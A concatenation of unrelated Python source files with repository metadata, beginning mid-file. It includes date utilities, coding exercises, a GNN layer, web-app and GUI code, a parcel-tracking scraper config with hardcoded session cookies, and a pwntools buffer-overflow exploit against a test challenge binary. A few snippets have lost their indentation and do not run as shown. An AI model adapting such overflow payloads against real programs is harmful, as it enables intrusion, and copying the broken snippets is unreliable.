    seconds are ignored) and return it as "%Y-%m-%d %H:00:00"."""
    parsed = datetime.strptime(
        datetime_string,
        COMMON_DATE_TIME_FORMAT if format is None else format)
    rounded = parsed + timedelta(hours=1) if parsed.minute > 30 else parsed
    return rounded.strftime("%Y-%m-%d %H:00:00")
def round_to_nearest_half_hour(datetime_string, format=None):
    """Round to the nearest half hour: minutes <= 15 -> :00,
    16-44 -> :30, >= 45 -> the next hour's :00."""
    parsed = datetime.strptime(
        datetime_string,
        COMMON_DATE_TIME_FORMAT if format is None else format)
    minute = parsed.minute
    if minute <= 15:
        return parsed.strftime("%Y-%m-%d %H:00:00")
    if minute < 45:
        return parsed.strftime("%Y-%m-%d %H:30:00")
    return (parsed + timedelta(hours=1)).strftime("%Y-%m-%d %H:00:00")
def round_to_nearest_x_minutes(datetime_string, mins, format=None):
    """Round to the nearest multiple of *mins* minutes past the hour
    (banker's rounding via round(); seconds are ignored)."""
    if format is None:
        format = COMMON_DATE_TIME_FORMAT
    parsed = datetime.strptime(datetime_string, format)
    # Top of the hour, re-parsed through *format*.  NOTE: assumes *format*
    # can parse strftime("%Y-%m-%d %H:00:00") output -- true for the default.
    hour_start = datetime.strptime(parsed.strftime("%Y-%m-%d %H:00:00"), format)
    steps = round(parsed.minute / mins)
    return (hour_start + timedelta(minutes=mins * steps)).strftime(format)
def round_up_datetime_to_nearest_x_minutes(datetime_value, mins):
    """Ceil *datetime_value*'s minute to the next multiple of *mins*
    (seconds/microseconds are dropped first, so :45:30 with mins=15
    still yields :45)."""
    floor_hour = datetime_value.replace(minute=0, second=0, microsecond=0)
    steps = math.ceil(datetime_value.minute / mins)
    return floor_hour + timedelta(minutes=mins * steps)
def round_down_datetime_to_nearest_x_minutes(datetime_value, mins):
    """Floor *datetime_value*'s minute to the previous multiple of *mins*
    (seconds/microseconds are dropped)."""
    floor_hour = datetime_value.replace(minute=0, second=0, microsecond=0)
    steps = math.floor(datetime_value.minute / mins)
    return floor_hour + timedelta(minutes=mins * steps)
# print(round_to_nearest_hour("2019-08-30 08:15:00"))
# print(round_to_nearest_half_hour("2019-08-30 23:58:00"))
# print(round_to_nearest_x_minutes("2019-08-30 08:16:00", 15))
# print(type(datetime.now()))
#
# time = datetime.strptime("2019-10-05 23:45:00", COMMON_DATE_TIME_FORMAT)
#
# print(round_up_datetime_to_nearest_x_minutes(time, 15))
# print(round_down_datetime_to_nearest_x_minutes(time, 15))
### UTC time
def get_SL_time_now():
return (datetime.utcnow() + timedelta(hours=5, minutes=30))
| [
"jshadhiniaseka@gmail.com"
] | jshadhiniaseka@gmail.com |
4a0652c78a692e7cda3b603546fa6bc28af17c34 | ef821468b081ef2a0b81bf08596a2c81e1c1ef1a | /Python Advanced/Tuples_and_Sets-Exercises/Periodic Table.py | e5ee6900c871b0256e37d4a4dfc9c36a0c190b7c | [] | no_license | Ivaylo-Atanasov93/The-Learning-Process | 71db22cd79f6d961b9852f140f4285ef7820dd80 | 354844e2c686335345f6a54b3af86b78541ed3f3 | refs/heads/master | 2023-03-30T20:59:34.304207 | 2021-03-29T15:23:05 | 2021-03-29T15:23:05 | 294,181,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | number = int(input())
unique_elements = set()
for i in range(number):
elements = input().split()
[unique_elements.add(element) for element in elements]
[print(element) for element in unique_elements]
| [
"ivailo.atanasov93@gmail.com"
] | ivailo.atanasov93@gmail.com |
d58ea80b3ae30f51247d56d865f826bcdbc7c2b0 | 12dd41cf81462d7e49de43202e5d3ee5a389ac69 | /app/lib/package_control/deps/oscrypto/version.py | c6494d5296b17f346a56b71abc297fd8b73368cf | [
"MIT"
] | permissive | rchl/packagecontrol.io | 02d39c70b63682697767287be6d4d2c5b851ace2 | d6acf2e0122def669aa2d38b5747a7c218516694 | refs/heads/master | 2021-03-15T08:31:18.443232 | 2020-01-22T14:38:59 | 2020-01-22T14:38:59 | 246,837,467 | 0 | 0 | NOASSERTION | 2020-03-12T13:10:40 | 2020-03-12T13:10:39 | null | UTF-8 | Python | false | false | 165 | py | # coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
__version__ = '1.2.0.dev1'
__version_info__ = (1, 2, 0, 'dev1')
| [
"will@wbond.net"
] | will@wbond.net |
26e98a8ba473fc7b12f71ed3389bf3bf1d05e2c9 | c4869d75f28507f6b37b04ca4f8d556f1900d5de | /yunda/yunda_spider/query_goods/yunda_conf.py | 1c82eece2cbd0b764b6d40c8dd9e6f42087f666f | [] | no_license | incinya/sklearn_img | 747a24c07e253f83c09039755d5fa00a2ae7ac9f | c8b85f82a2fc270904494afc9886161b39024976 | refs/heads/master | 2022-12-24T03:01:36.129859 | 2020-08-05T08:22:57 | 2020-08-05T08:22:57 | 263,810,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | url = "http://ykjcx.yundasys.com/go.php"
url2 = "http://ykjcx.yundasys.com/go_wsd.php"
url3 = "http://ykjcx.yundasys.com/zb1qBpg2.php"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36",
"Cookie": "PHPSESSID=0loq49ujoml8svcd9p7ur37qq5; JSESSIONID=qMbGpgsYdvLbpk1tGQ8nsNknnB6gwTJmWqLJMxTdbSspMQJSXqvN!-933856493",
}
filename = '002.png'
| [
"283438692@qq.com"
] | 283438692@qq.com |
d1a03b2a8a6ad4af3b7e287061ce0af9e2c9b846 | bde6ed092b7b29703737e11c5a5ff90934af3d74 | /AtCoder/ABC/119/c.py | ab6ab58c8b33c11706d228a8564b2fc9050bf892 | [] | no_license | takecian/ProgrammingStudyLog | 2ab7ea601e0996b3fa502b81ec141bc3772442b6 | 94485d131c0cc9842f1f4799da2d861dbf09b12a | refs/heads/master | 2023-04-28T16:56:18.943574 | 2023-04-18T06:34:58 | 2023-04-18T06:34:58 | 128,525,713 | 4 | 0 | null | 2022-12-09T06:15:19 | 2018-04-07T12:21:29 | Python | UTF-8 | Python | false | false | 1,547 | py | # https://atcoder.jp/contests/abc119/tasks/abc119_c
import copy
import itertools
# 長さ t の竹を L から少ないコストで作る方法を探す
def solve(t, l, c):
min_cost = 100000
cand = []
# 全組み合わせを考えて一番コストの低いものを使う
ptn = 1 << len(l) # Bit 全探索
for i in range(1, ptn):
answers = []
for j in range(0, len(l)):
if (i >> j) & 1:
answers.append(l[j])
temp_cost = abs(t - sum(answers)) + (10 * (len(answers) - 1) if len(answers) > 1 else 0)
if temp_cost < min_cost:
min_cost = temp_cost
cand = answers
# print("cand = {}".format(cand))
for d in cand:
del l[l.index(d)]
return min_cost, l
def main():
N, A, B, C = map(int, input().split())
L = [int(input()) for _ in range(N)]
L.sort()
answer = 1000000
for targets in itertools.permutations([A, B, C]):
is_done = [False] * 3
L2 = copy.copy(L)
total_cost = 0
# 同じ長さの竹があったら使う
for i in range(len(targets)):
if targets[i] in L2:
del L2[L2.index(targets[i])]
is_done[i] = True
# 同じ長さの竹がない場合
for i in range(3):
if is_done[i]:
continue
cost, L2 = solve(targets[i], L2, 0)
total_cost += cost
answer = min(answer, total_cost)
print(answer)
if __name__ == '__main__':
main()
| [
"takecian@gmail.com"
] | takecian@gmail.com |
8f274a48f43e048c77afdc94cf23e0d85d5ea79d | 2a8068c87a082e0c12583aceeba7ec4e56968c88 | /src/synbio/ligate_singlefasta_with_vector_gui.py | 3ebea6754723b87b37d3a0340537d2d9f7ef08c1 | [
"MIT"
] | permissive | olgatsiouri1996/bioinfo_gui_scripts | 02feeefc2d94a006a15d3ae569ddaabb3ae23414 | 01056fd4188f459b293eb7bd19aea30c58ec0487 | refs/heads/master | 2023-08-18T09:41:46.371644 | 2023-08-14T12:24:18 | 2023-08-14T12:24:18 | 297,280,118 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,675 | py | # python3
import os
from gooey import *
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio import SeqFeature
# imput parameters
@Gooey(required_cols=2, program_name='ligate single-fasta files with vector', header_bg_color= '#DCDCDC', terminal_font_color= '#DCDCDC', terminal_panel_color= '#DCDCDC')
def main():
ap = GooeyParser(description="ligate vector with inserts in single-fasta files")
ap.add_argument("-vr", "--vector", required=True, widget='FileChooser', help="vector in genbank format")
ap.add_argument("-dir", "--directory", required=True, type=str, widget='DirChooser', help="directory to search for fasta files")
args = vars(ap.parse_args())
# main
# linear vector
plasmid = SeqIO.read(args['vector'], "genbank")
x = str(plasmid.seq)
# retrieve the name of the input file
file = os.path.split(args['vector'])[1]
# DNA insert
# import each fasta file from the working directory
for filename in sorted(os.listdir(os.chdir(args['directory']))):
if filename.endswith(".fa") or filename.endswith(".fasta"):
record = SeqIO.read(filename, "fasta")
y = str(record.seq)
# merge
seqad = x + y
# add this record to the list
ligated = SeqRecord(Seq(seqad),id='_'.join([record.id,file.split(".")[0]]),description="",annotations={"molecule_type":"DNA","topology":"circular"})
ligated.features = plasmid.features
# export to genbank
SeqIO.write(ligated,"".join([filename.split(".")[0],"_",file.split(".")[0],".gb"]), "genbank")
if __name__ == '__main__':
main()
| [
"olgatsiouri@outlook.com"
] | olgatsiouri@outlook.com |
4ba4f8795a7eb913615680ccd1eb99603d09a8f7 | 8f4d7da050401865af3cd3341adb323062ae6447 | /count_smaller.py | 6dde4180293087884aced94ef57774c67470a776 | [] | no_license | ankitomss/python_practice | e68c2446f173018c093187b9e5ba31f21f994eac | f46ab3bcafbca4d0209df3aa9114dad52bda76b2 | refs/heads/master | 2021-01-11T05:15:15.369203 | 2016-10-13T03:00:58 | 2016-10-13T03:00:58 | 69,192,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | def findindex(sort, x):
s, e = 0, len(sort)-1
if x < sort[s]: return s
if x > sort[e]: return e+1
while s<=e:
m = (s+e)/2
if s==e:
return s if x <= sort[s] else s+1
elif sort[m] == x:
while sort[m] == x:
m -= 1
return m+1
elif sort[m] < x:
s = m+1
elif sort[m] > x:
e = m-1
return s
def count_smaller(nums):
n = len(nums)
sort = [nums[n-1]]
ans = [0] * n
for i in range(n-2, -1, -1):
index = findindex(sort, nums[i])
print sort, index
sort.insert(index, nums[i])
ans[i] = index
return ans
nums = [5, 2, 6,2,2, 3]
print count_smaller(nums) | [
"v.ankit001@gmail.com"
] | v.ankit001@gmail.com |
126f82ce2f0b2053d004967d70746126610dc429 | 622a93a85402cd6d4e0c477dfd5c9370e9d918b9 | /torch_geometric/nn/conv/nn_conv.py | a9745fcf22ff93854280127711ccb58f65a9137c | [
"MIT"
] | permissive | YuGuangWang/pytorch_geometric | 1bfe88366ee661bc91d2909400e568e157796bfb | 44ce5378e71b8fa4adefb6baa1f597a30b48ba5f | refs/heads/master | 2021-11-21T12:31:53.659731 | 2021-08-24T11:21:48 | 2021-08-24T11:21:48 | 202,147,128 | 0 | 0 | MIT | 2020-01-16T07:29:44 | 2019-08-13T13:09:08 | Python | UTF-8 | Python | false | false | 4,329 | py | from typing import Union, Tuple, Callable
from torch_geometric.typing import OptTensor, OptPairTensor, Adj, Size
import torch
from torch import Tensor
from torch.nn import Parameter
from torch_geometric.nn.conv import MessagePassing
from ..inits import reset, uniform, zeros
class NNConv(MessagePassing):
r"""The continuous kernel-based convolutional operator from the
`"Neural Message Passing for Quantum Chemistry"
<https://arxiv.org/abs/1704.01212>`_ paper.
This convolution is also known as the edge-conditioned convolution from the
`"Dynamic Edge-Conditioned Filters in Convolutional Neural Networks on
Graphs" <https://arxiv.org/abs/1704.02901>`_ paper (see
:class:`torch_geometric.nn.conv.ECConv` for an alias):
.. math::
\mathbf{x}^{\prime}_i = \mathbf{\Theta} \mathbf{x}_i +
\sum_{j \in \mathcal{N}(i)} \mathbf{x}_j \cdot
h_{\mathbf{\Theta}}(\mathbf{e}_{i,j}),
where :math:`h_{\mathbf{\Theta}}` denotes a neural network, *.i.e.*
a MLP.
Args:
in_channels (int or tuple): Size of each input sample. A tuple
corresponds to the sizes of source and target dimensionalities.
out_channels (int): Size of each output sample.
nn (torch.nn.Module): A neural network :math:`h_{\mathbf{\Theta}}` that
maps edge features :obj:`edge_attr` of shape :obj:`[-1,
num_edge_features]` to shape
:obj:`[-1, in_channels * out_channels]`, *e.g.*, defined by
:class:`torch.nn.Sequential`.
aggr (string, optional): The aggregation scheme to use
(:obj:`"add"`, :obj:`"mean"`, :obj:`"max"`).
(default: :obj:`"add"`)
root_weight (bool, optional): If set to :obj:`False`, the layer will
not add the transformed root node features to the output.
(default: :obj:`True`)
bias (bool, optional): If set to :obj:`False`, the layer will not learn
an additive bias. (default: :obj:`True`)
**kwargs (optional): Additional arguments of
:class:`torch_geometric.nn.conv.MessagePassing`.
"""
def __init__(self, in_channels: Union[int, Tuple[int, int]],
out_channels: int, nn: Callable, aggr: str = 'add',
root_weight: bool = True, bias: bool = True, **kwargs):
super(NNConv, self).__init__(aggr=aggr, **kwargs)
self.in_channels = in_channels
self.out_channels = out_channels
self.nn = nn
self.aggr = aggr
if isinstance(in_channels, int):
in_channels = (in_channels, in_channels)
self.in_channels_l = in_channels[0]
if root_weight:
self.root = Parameter(torch.Tensor(in_channels[1], out_channels))
else:
self.register_parameter('root', None)
if bias:
self.bias = Parameter(torch.Tensor(out_channels))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
reset(self.nn)
if self.root is not None:
uniform(self.root.size(0), self.root)
zeros(self.bias)
def forward(self, x: Union[Tensor, OptPairTensor], edge_index: Adj,
edge_attr: OptTensor = None, size: Size = None) -> Tensor:
""""""
if isinstance(x, Tensor):
x: OptPairTensor = (x, x)
# propagate_type: (x: OptPairTensor, edge_attr: OptTensor)
out = self.propagate(edge_index, x=x, edge_attr=edge_attr, size=size)
x_r = x[1]
if x_r is not None and self.root is not None:
out += torch.matmul(x_r, self.root)
if self.bias is not None:
out += self.bias
return out
def message(self, x_j: Tensor, edge_attr: Tensor) -> Tensor:
weight = self.nn(edge_attr)
weight = weight.view(-1, self.in_channels_l, self.out_channels)
return torch.matmul(x_j.unsqueeze(1), weight).squeeze(1)
def __repr__(self):
return '{}({}, {}, aggr="{}", nn={})'.format(self.__class__.__name__,
self.in_channels,
self.out_channels,
self.aggr, self.nn)
ECConv = NNConv
| [
"matthias.fey@tu-dortmund.de"
] | matthias.fey@tu-dortmund.de |
dba3da1a114dfe1aa55bffeefb45f64e348b7f33 | 1834d070640596ad1b96fbfeb92168be078753ee | /web_flask/9-states.py | 723fc16fbf6287fff9052df6b2fa750b40ab2e2d | [] | no_license | EtienneBrJ/AirBnB_clone_v2 | c8cc34064b19ccea950c343ecff96424946cf942 | b4b9c3339a7b7e2e24f2a7e0d35cc65407a30ee6 | refs/heads/master | 2023-08-15T01:06:10.489905 | 2021-09-21T18:21:13 | 2021-09-21T18:21:13 | 393,375,203 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,115 | py | #!/usr/bin/python3
"""Starts a Flask web application.
The application listens on 0.0.0.0, port 5000.
Routes:
/states: HTML page with a list of all State objects.
/states/<id>: HTML page displaying the given state with <id>.
"""
from models import storage
from models.state import State
from flask import Flask
from flask import render_template
app = Flask(__name__)
@app.route("/states", strict_slashes=False)
def states():
"""Displays an HTML page with a list of all States.
States are sorted by name.
"""
states = storage.all("State")
return render_template("9-states.html", state=states)
@app.route("/states/<id>", strict_slashes=False)
def states_id(id):
"""Displays an HTML page with info about <id>, if it exists."""
for state in storage.all("State").values():
if state.id == id:
return render_template("9-states.html", state=state)
return render_template("9-states.html")
@app.teardown_appcontext
def teardown(exc):
"""Remove the current SQLAlchemy session."""
storage.close()
if __name__ == "__main__":
app.run(host="0.0.0.0")
| [
"etiennebrxv@gmail.com"
] | etiennebrxv@gmail.com |
f75c9d8254829452892249b7c92e561212cfe494 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /00_BofVar-unit-tests/05_64/remenissions-work/exploit-BofFunc-6.py | fcbd195258ee74db0902705c26c4042d6c3f5b85 | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | from pwn import *
import time
import sys
import signal
import sf
target = process("./chall-test_BofVar-05-x64")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=64)
bof_payload.set_input_start(0x58)
bof_payload.add_int32(0x20, 0xdeab)
bof_payload.add_int32(0x1c, 0xbef1)
bof_payload.add_int32(0x18, 0xfacadf)
bof_payload.add_int32(0x14, 0xbeef)
bof_payload.add_int32(0x10, 0xfacadf)
bof_payload.add_int32(0xc, 0xdeac)
bof_payload.set_ret(0x400537)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
def check_verification_done():
while True:
if os.path.exists("pwned") or os.path.exists("rip"):
sys.exit(0)
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
check_verification_done()
except Exception:
print("Exploit timed out")
| [
"ryancmeinke@gmail.com"
] | ryancmeinke@gmail.com |
4fc21a018f8acd4f1139eef64dbbd8155544d2d6 | 5db4e48731162a8a3fc5a6996ace94fb0e692e67 | /packages/registry/setup.py | 6c826670e69f58b49b2ec932f22d4bb4faa5afa1 | [
"Apache-2.0"
] | permissive | 0mars/monoskel | 89026f50179d47b455f3ed2062d8d5eeb53c7c7c | 1755f3c047d56b5cfe8e9b36b77c1e155bbd5a51 | refs/heads/master | 2022-12-13T18:59:56.232663 | 2020-12-26T09:22:47 | 2020-12-26T09:22:47 | 202,740,303 | 2 | 1 | Apache-2.0 | 2022-12-08T07:45:54 | 2019-08-16T14:18:07 | Python | UTF-8 | Python | false | false | 1,385 | py | from os.path import abspath, dirname, join as pjoin
from setuptools import setup, find_packages
root = dirname(abspath(__file__))
def execfile(fname, globs, locs=None):
locs = locs or globs
exec(compile(open(fname).read(), fname, "exec"), globs, locs)
source_path = 'src'
packages = find_packages(source_path)
root_packages = [
package
for package in packages
if "." not in package
]
assert len(root_packages) == 1
package = root_packages[0]
package_directory = pjoin(root, source_path, package)
def get_variable_from_file(filepath, variable):
filepath_in_package = pjoin(package_directory, filepath)
globs = {}
execfile(filepath_in_package, globs)
variable_value = globs[variable]
return variable_value
version = get_variable_from_file('_version.py', '__version__')
setup(
name=package,
version=version,
python_requires='>=3.6',
description='',
classifiers=[
'Development Status :: Stable',
'License :: OSI Approved :: General Public License v3 or later (AGPLv3+)',
'Programming Language :: Python :: 3.7',
'Intended Audience :: Developers'
],
packages=packages,
package_dir={'': source_path},
include_package_data=True,
package_data={package: []},
license='AGPL-3.0-or-later',
extras_require={
'test': [
'pytest'
]
}
)
| [
"omars@php.net"
] | omars@php.net |
be1d8368cd3341d801cb37602eb29889e335ae8d | f642c054451aa3c87bb18fa63037eea0e6358bda | /geektrust/loan_payments/customer_manager/models.py | dd3d0fcba64b05726d057e2eaccfe8378e3e3068 | [] | no_license | devendraprasad1984/python | 30f3a539e92be13d893246ad28a42907457a38d5 | 0f1badabba07fbe7f5f792b7e543c0748eecd6c7 | refs/heads/master | 2023-07-21T08:22:45.193077 | 2021-08-27T15:09:28 | 2021-08-27T15:09:28 | 254,812,552 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | from django.db import models
# Create your models here.
class CUSTOMERS(models.Model):
id = models.AutoField(auto_created=True, primary_key=True)
name = models.CharField(max_length=200, null=True)
uid = models.CharField(max_length=30, null=True, unique=True)
age = models.IntegerField()
email = models.EmailField(null=True)
loan_limit = models.DecimalField(max_digits=10, decimal_places=2)
when = models.DateTimeField(auto_now_add=True, blank=True)
| [
"devendraprasad1984@gmail.com"
] | devendraprasad1984@gmail.com |
3bc92ac198515b5ea4965ab5ada7b4cb625936bf | fc13edeb7ffb6ed9bf8e953fa08f97e5d2346316 | /src/manage.py | 8b7a2e00c6553673e8032e4f2d79e06488161725 | [
"BSD-3-Clause"
] | permissive | tykling/sslscout | 8105e61fe37337986ad9e4ba13180435d8a57d25 | c07395faf8b85c535b41d355934161e0b43e4c04 | refs/heads/master | 2021-01-16T20:31:33.028501 | 2014-06-26T05:50:37 | 2014-06-26T05:50:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | #!/usr/local/bin/python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sslscout.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"thomas@gibfest.dk"
] | thomas@gibfest.dk |
c1df8a31f6ab9b5ed0f4f1b3670141d3a8a33983 | 8583b2be92327b21af50237c7c71607f0bdb7be8 | /section07/lecture083/lesson.py | 069bf3d264888ab697fd8cc5557e6cb7fe588c24 | [] | no_license | DIT-Python/Python3_Basic_to_Advance_SV | 654061aa3e151146e78a0e8ac26366dcf62758be | fb6bc230a42cbaf08337cb2f11a2bbeaee6bc2e3 | refs/heads/master | 2022-01-10T16:59:01.725413 | 2019-05-05T10:51:55 | 2019-05-05T10:51:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 888 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
class Car(object):
def __init__(self, model=None):
self.model = model
def run(self):
print('run')
class ToyotaCar(Car):
def run(self):
print('first run')
class TeslaCar(Car):
def __init__(self, model='Model s', enable_auto_run=False):
super().__init__(model)
self._enable_auto_run = enable_auto_run
@property
def enable_auto_run(self):
return self._enable_auto_run
# @enable_auto_run.setter
# def enable_auto_run(self, is_enable):
# self._enable_auto_run = is_enable
def run(self):
print('super run')
def auto_run(self):
print('auto run')
# toyota_car = ToyotaCar('Lexus')
# print(toyota_car.model)
# toyota_car.run()
tesla_car = TeslaCar('Model s')
tesla_car.enable_auto_run = True
print(tesla_car.enable_auto_run)
| [
"takuya.stdmailbox#gmail.com"
] | takuya.stdmailbox#gmail.com |
915ec1588a27b8009f790f24aa7ea2cc31e70c29 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02760/s311421606.py | a93b2cc600572cd086910cf1b5f673e2ae71626b | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | a = [list(map(int, input().split())) for i in range(3)]
n =int(input())
for k in range(n):
b = int(input())
for i in range(3):
for j in range(3):
if a[i][j] == b:
a[i][j] = 0
row0 = a[0] == [0, 0, 0]
row1 = a[1] == [0, 0, 0]
row2 = a[2] == [0, 0, 0]
colum0 = [a[0][0], a[1][0], a[2][0]] == [0, 0, 0]
colum1 = [a[0][1], a[1][1], a[2][1]] == [0, 0, 0]
colum2 = [a[0][2], a[1][2], a[2][2]] == [0, 0, 0]
diag0 = [a[0][0], a[1][1], a[2][2]] == [0, 0, 0]
diag1 = [a[2][0], a[1][1], a[0][2]] == [0, 0, 0]
if row0 or row1 or row2 or colum0 or colum1 or colum2 or diag0 or diag1:
print('Yes')
break
else:
print('No') | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f4c3838c07ae1aaefeab17865de863e3ebcd810e | b13c57843cb8886c6f5d630ca099ad9130b26f25 | /python/5일차/selenium04/model_company.py | 36df3d2849c1ab88b65e7e3bf0d5329748b8c358 | [] | no_license | schw240/07.27-12.1_CLOUD | 6b563318f7208b843a13634a1cf46206197d6dfc | 8b4dc2d31e5d2ba96bde143116aba3ba0dad7a49 | refs/heads/master | 2023-03-25T15:44:03.555567 | 2021-03-30T02:09:32 | 2021-03-30T02:09:32 | 282,791,349 | 4 | 0 | null | 2021-03-19T15:00:00 | 2020-07-27T04:10:56 | Jupyter Notebook | UTF-8 | Python | false | false | 411 | py | class Company:
def __init__(self, _symbol, _name, _last_sale, _market_cap, _ipo_year, _sector, _industry, _summary_quote):
self.symbol = _symbol
self.name = _name
self.last_sale = _last_sale
self.market_cap = _market_cap
self.ipo_year = _ipo_year
self.sector = _sector
self.industry = _industry
self.summary_quote = _summary_quote
| [
"user@email.mail"
] | user@email.mail |
869e40e7fc3dd44ef9bd59de24782b32a660ee84 | e79e8eeb1f7063ccc2b48354ed890d63b0aad632 | /fload/stream/pipeline/filter.py | b330d61a5825192b65e7c8dad01923dc96360bfe | [
"Apache-2.0"
] | permissive | kevenli/fload | c7741c2c5729e720a1a24da2cedbb88c8b38c50a | 56cdbe7732bc6bddad17cd767bdb3e5607ee60c8 | refs/heads/main | 2023-06-18T19:22:55.721927 | 2021-07-19T13:38:44 | 2021-07-19T13:38:44 | 378,568,183 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,303 | py | from argparse import ArgumentParser
import re
from fload import Pipeline
class FilterPipeline(Pipeline):
field = None
regex = None
value = None
expression = None
def add_arguments(self, parser:ArgumentParser):
parser.add_argument('--field', required=True)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--value')
group.add_argument('--regex')
group.add_argument('--expression', '--exp')
def init(self, ops):
self.field = ops.field
self.regex = ops.regex
self.value = ops.value
self.expression = ops.expression
def process(self, item):
field_value = item.get(self.field)
if field_value is None:
return None
if self.regex:
field_value = str(field_value)
if re.search(self.regex, field_value):
return item
else:
return None
if self.value is not None:
compare_value = convert_type(self.value, type(field_value))
if compare_value == field_value:
return item
else:
return None
def convert_type(value, t):
return t(value)
| [
"pbleester@gmail.com"
] | pbleester@gmail.com |
024b564567774e5abf26b0a0070d43f4bc16f008 | 7d90d2ce27c6ee0af74391b09909edbd45fdc2f0 | /modules/VHF_radio/TEST2.py | 341f621d2c9d008f3bfab1a7ec1162f9f94641e6 | [] | no_license | gaoxingyu-hub/54testframework-master-e284 | d7ea0d4a715b65c8652430e963a86b9522a7237a | 57dd2197e7d91b8ad8fb2bd0e3503f10afa08544 | refs/heads/master | 2023-04-30T05:50:41.542402 | 2021-05-28T09:19:37 | 2021-05-28T09:19:37 | 309,922,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,377 | py | from PyQt5.QtCore import pyqtSlot, QPoint, Qt
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QDialog, QGraphicsItem
from PyQt5.QtCore import pyqtSignal
from PyQt5 import QtGui, QtWidgets, QtCore
import os
from constant_trans import TransConstants
from modules.VHF_radio.Ui_TEST2 import Ui_Dialog
from PyQt5.QtCore import pyqtSignal
from common.info import Constants
from PyQt5 import QtGui
from common.logConfig import Logger
from PyQt5.QtWidgets import QMessageBox
from modules.VHF_radio.VHF_radio_CONSTANT import ModuleConstants
logger = Logger.module_logger("DialogTest2")
class DialogTest2(QDialog, Ui_Dialog):
"""
Class documentation goes here.
"""
signalTest = pyqtSignal(object)
signalPrint=pyqtSignal(object)
signalFinish1 = pyqtSignal(str, object)
def __init__(self, parent=None):
"""
Constructor
@param parent reference to the parent widget
@type QWidget
"""
super(DialogTest2, self).__init__(parent)
self.setupUi(self)
self.state=''
self.test_result = test_results()
self.action = 'finish_all'
@pyqtSlot()
def on_pushButton_1_clicked(self):
"""
Slot documentation goes here.
"""
# TODO: not implemented yet
self.signalFinish1.emit("next", None)
self.close()
@pyqtSlot()
def on_pushButton_2_clicked(self):
if self.state=='2':
self.test_result.test_item=ModuleConstants.VHF_radio
self.test_result.test_condition=''
self.test_result.test_results=ModuleConstants.VHF_PWOER_PANNEL
self.test_result.test_conclusion='FAIL'
QMessageBox.information(self, TransConstants.tip_info, ModuleConstants.VHF_PWOER_PANNEL, QMessageBox.Ok)
elif self.state == '3':
self.test_result.test_item = ModuleConstants.system_load
self.test_result.test_condition = ''
self.test_result.test_results = ModuleConstants.ssm_pannel
self.test_result.test_conclusion = 'FAIL'
QMessageBox.information(self, ModuleConstants.tip, ModuleConstants.ssm_pannel, QMessageBox.Ok)
elif self.state=='4':
self.test_result.test_item = ModuleConstants.mianban_caozuo
self.test_result.test_condition = ''
self.test_result.test_results = ModuleConstants.ssm_pannel
self.test_result.test_conclusion = 'FAIL'
QMessageBox.information(self, ModuleConstants.tip,ModuleConstants.ssm_pannel, QMessageBox.Ok)
elif self.state=='27':
self.test_result.test_item = ModuleConstants.two_radio_yuyin
self.test_result.test_condition = ''
self.test_result.test_results = ModuleConstants.ssm_pannel
self.test_result.test_conclusion = 'FAIL'
QMessageBox.information(self, ModuleConstants.tip, ModuleConstants.ssm_pannel, QMessageBox.Ok)
self.signalTest.emit("test")
self.signalPrint.emit('print')
self.close()
def set_contents(self, title, contents,img_file_path ):
"""
set gui display information
:param title: dialog window title
:param contents: tips
:param img_file_path:image file full path
:return: none
"""
try:
self.setWindowTitle(title)
self.textBrowser_contents.setText(contents)
if img_file_path and img_file_path != "":
if os.path.isfile(img_file_path) and os.access(img_file_path, os.W_OK):
self.pixmap = QtGui.QPixmap(img_file_path)
self.pixmap = self.pixmap.scaled(600, 600,
Qt.IgnoreAspectRatio | Qt.SmoothTransformation)
self.label_img.setPixmap(self.pixmap)
self.label_img.setAlignment(Qt.AlignCenter)
except BaseException as e:
logger.error(str(e))
return
def set_state(self,state):
self.state=state
@pyqtSlot()
def closeEvent(self, event):
if self.action == 'finish_all':
self.signalFinish1.emit('finish_all', None)
event.accept()
#
class test_results:
def __init__(self):
self.test_item=''
self.test_condition=''
self.test_results=''
self.test_conclusion=''
| [
